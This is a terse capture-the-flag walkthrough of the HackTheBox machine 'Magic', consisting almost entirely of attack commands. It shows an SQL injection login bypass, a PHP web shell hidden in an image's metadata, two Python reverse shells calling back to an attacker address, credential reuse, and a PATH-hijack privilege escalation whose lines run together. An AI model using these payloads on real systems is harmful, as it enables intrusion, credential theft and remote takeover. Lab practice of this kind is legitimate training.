HackTheBox — Magic

2 min readMay 16, 2020

nmap -sC -sV -p- 10.10.10.185

http://10.10.10.185/

http://10.10.10.185/login.php

username=admin' or 1=1--+&password=password

exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png

mv test.png test.php.png

http://10.10.10.185/images/uploads/test.php.png?cmd=ls

http://10.10.10.185/images/uploads/test.php.png?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python3 -c "import pty;pty.spawn('/bin/bash')"

cd /var/www/Magic
cat db.php5

mysqldump --databases Magic -utheseus -piamkingtheseus

su theseus
Th3s3usW4sK1ng

cat /home/theseus/user.txt

Privilege Escalation

cd /tmptouch fdiskecho python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4442));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > fdiskexport PATH=/tmp:$PATHchmod 755 fdisksysinfo

python3 -c "import pty;pty.spawn('/bin/bash')"
cat /root/root.txt

HackTheBox — Magic

Privilege Escalation

Written by CyberOPS by LittleDog